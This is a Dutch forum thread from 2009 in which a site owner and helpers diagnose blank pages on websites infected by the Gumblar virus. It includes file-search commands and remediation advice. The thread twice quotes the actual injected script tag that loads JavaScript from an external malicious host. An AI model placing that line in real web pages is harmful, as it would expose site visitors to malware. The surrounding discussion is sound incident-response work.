davidem om 18:16, 26-10-2009Heb je telnet of ssh toegang naar de documentroot van je site? Als dat zo is, dan kan je heel simpel checken of een bepaald stukje tekst in een bestand staat, en helemaal makkelijk als alle html files in 1 directory staan. En wel met het volgende commandotje:"grep keygenguru *"
"grep keygenguru *"
find . -exec grep -i keygenguru {} \;
Run dat in de docroot van de desbetreffende website.
Daarnaast, ook...
Zoeken naar recent gewijzigde bestanden (laatste zeven dagen):
find . -mtime -7
Zoeken naar world-writable files en directories (beiden NIET gewenst)
find . -type f -perm -o+wfind . -type d -perm -o+w
(Bewerkt door Cailin Coilleach om 14:29, 27-10-2009)
En dat comando moet je dan in telnet of SSH invoeren? Zijn dat programma's of is dat een protocol? Wat heb ik nodig?
Om van SSH gebruik te maken moet je provider je eerst toegang geven tot SSH op je web server. Niet elke hoster doet dat omdat ze niet willen dat hun klanten op hun servers rommelen. Heb je een goede hoster dan heb je -wel- SSH toegang. Zo ja, dan heb je een username en password gekregen van je hoster dat hiervoor gebruikt kan worden.
Een SSH verbinding zet je als volgt op:
ssh username@server
Waarbij je "username" vervangt met, je raadt het al, je username en "server" met de naam van je server. Bijvoorbeeld cailin@www.voorbeeld.nl
Via SSH (of telnet) krijg je toegang tot de command line van je web server. Daar kan je inderdaad de commando's die we je gaven uitvoeren. Eerst moet je nog wel met het "cd" commando naar de juiste directory gaan.
Overigens kan je dit ook allemaal op je Mac doen, mits je eerst alle files van de webserver download. Dan kan je de commando's lokaal (zonder SSH) uitvoeren in de directory waar je alle files naartoe hebt gedownload.
Maar ik blijf met een groot raadsel zitten:Ondertussen lijkt het alsof veel van mijn sites besmet zijn. Ik krijg bij 80% van de sites zo'n blanco pagina. Ik heb nu de gemakkelijkste er uit gepikt. Die heeft alleen een index.htm en een jpeg.
http://floorste.nl/
Het beste is het probleem te reproduceren in firefox: Cookies verwijderen, site oproepen en eventueel refreshbutton 1 of 2 keer aanklikken. Als de pagina blanco is dan is in de paginabron de code te zien die door het virus wordt gegenereerd.In de index.html is echt helemaal niets te zien!? Verder zoeken kan toch niet?De wanhoop slaat nu langzaam maar zeker wel toe.
Ik heb de code gezien, maar dat is niet de code van de server. Ondertussen weet ik al wat meer over het virus en de vorm die het heeft.
Op de server staat in de geinfecteerde sites een lijn zoals eerder beschreven en die haalt het javascript op van de site die in de link staat. Het script zelf staat dus niet op de server.
De pagina's op de sites worden geinfecteerd door het gumblar virus. Dat onderschept de ftp paswoorden en download dan alle bestanden en laad ze terug op met de code erin. meer uitleg over dit virus staat op
http://webwereld.nl/nieuws/58852/-gumblar-is-gevaarlijker-dan-conficker-.html
Als er meerdere sites zijn dan zal een pc die de ftp paswoorden heeft geinfecteerd zijn. De oplossing is een proces in meerdere stappen:
- maak alle pc's virusvrij- pas de paswoorden aan van de ftp- gebruik voortaan ftps om te ftp'en.
De server zelf heeft geen virus en de sites zijn niet gehacked. Op de site zijn de gevolgen van een virus te zien dat op een pc staat die gebruikt wordt om de site op te laden.
Die lijn waar hij het over heeft is:<script src=http://express22.eco.coocan.jp/bana/hkysenri.php ></script>
(Bewerkt door applesien om 17:12, 27-10-2009)
Voor wie het niet weet (kennisniveau verhaal), een bestand met een . (punt) aan het begin is onzichtbaar via FTP maar via de instellingen in je FTP cliënt kan je deze bestanden wel zichtbaar maken.
Het is mogelijk dat op die manier inhoud wordt weergegeven die niet in overeenkomst is met de feitelijke code in index.html. Soms wordt op die manier bijvoorbeeld een tekstbestand, geplaatst in een andere map (/images) getoond. Hackers maken regelmatig gebruik van deze methode om sites te verkl*ten.
Ik haat hackers.
applesien om 17:09, 27-10-2009En dit is wat de provider zegt:Ik heb de code gezien, maar dat is niet de code van de server. Ondertussen weet ik al wat meer over het virus en de vorm die het heeft.Op de server staat in de geinfecteerde sites een lijn zoals eerder beschreven en die haalt het javascript op van de site die in de link staat. Het script zelf staat dus niet op de server.De pagina's op de sites worden geinfecteerd door het gumblar virus. Dat onderschept de ftp paswoorden en download dan alle bestanden en laad ze terug op met de code erin. meer uitleg over dit virus staat ophttp://webwereld.nl/nieuws/58852/-gumblar-is-gevaarlijker-dan-conficker-.html Als er meerdere sites zijn dan zal een pc die de ftp paswoorden heeft geinfecteerd zijn. De oplossing is een proces in meerdere stappen:- maak alle pc's virusvrij- pas de paswoorden aan van de ftp- gebruik voortaan ftps om te ftp'en.De server zelf heeft geen virus en de sites zijn niet gehacked. Op de site zijn de gevolgen van een virus te zien dat op een pc staat die gebruikt wordt om de site op te laden.Die lijn waar hij het over heeft is:<script src=http://express22.eco.coocan.jp/bana/hkysenri.php ></script>(Bewerkt door applesien om 17:12, 27-10-2009)
In je laatste zin (na de dubbele punt) valt tekst weg:
Die lijn waar hij het over heeft is:< script src=http://express22.eco.coocan.jp/bana/hkysenri.php ></script >
(ik heb even een spatie na de eerste "<" en vóór de laatste ">" gezet, waardoor het nu wel zichtbaar is.)
Ik begrijp niet goed wat je bedoelt, kan je iets duidelijker zijn? Is je site nu wel of niet geïnfecteerd?
Zit het virus misschien in de afbeelding "floor.jpg" ingesloten? Om dit te testen even een nieuwe site maken met dezelfde "floor.jpg" die op de server staat?
(Bewerkt door Cailin Coilleach om 18:21, 27-10-2009)
Ik hoop niet dat ik nu tot één van de Eerste/Floorste behoor die een virus op de Mac oploopt. Loop ik nu kans dat mijn Mac door dit javascript geïnfecteerd is?
Begrijp ik het goed dat het linkje wèl gevaarlijk om te openen op een Windows PC?
@Cailin CoilleachHoe kan ik die commando's van jou lokaal uitvoeren?
Doe nu de commando's die we hier boven gaven.
EDIT:Als je iChat hebt met een AOL of Jabber account wil ik je ook wel via Screen Sharing helpen.
(Bewerkt door Cailin Coilleach om 18:55, 27-10-2009)
applesien om 18:48, 27-10-2009@ leander:Of de site geïnfecteerd is? Het lijkt me wel, anders lijkt het mij onmogelijk dat anderen dezelfde blanco pagina met verborgen code in hun browser te voorschijn toveren.
applesien om 17:09, 27-10-2009...Op de server staat in de geinfecteerde sites een lijn zoals eerder beschreven en die haalt het javascript op van de site die in de link staat. Het script zelf staat dus niet op de server....De server zelf heeft geen virus en de sites zijn niet gehacked. Op de site zijn de gevolgen van een virus te zien dat op een pc staat die gebruikt wordt om de site op te laden....
Niet gehackt, wel geïnfecteerd? Dat begrijp ik niet.
Het FTP wachtwoord is afgeluisterd dankzij een virus op een PC die toegang heeft tot de webserver. Via dit geleende (en dus strikt genomen niet gehackte) wachtwoord verschaft het virus zich toegang tot de webserver om de files aan te passen. De aanval is dus eigenlijk uitgevoerd met de PC als doel en niet de webserver.
(Bewerkt door applesien om 20:32, 27-10-2009)
Worden de geinfecteerde pagina's (weet je nu welke dit zijn?) telkens weer opnieuw geinfecteerd?Is je site uberhaupt momenteel nog besmet?
Enne, weet je zeker dat je klanten niet ook de passwords hebben voor het gebruik van FTP? Onder het motto: "wij moeten ook toegang hebben tot de files". Het kan best een van hun PCs zijn.
Gast
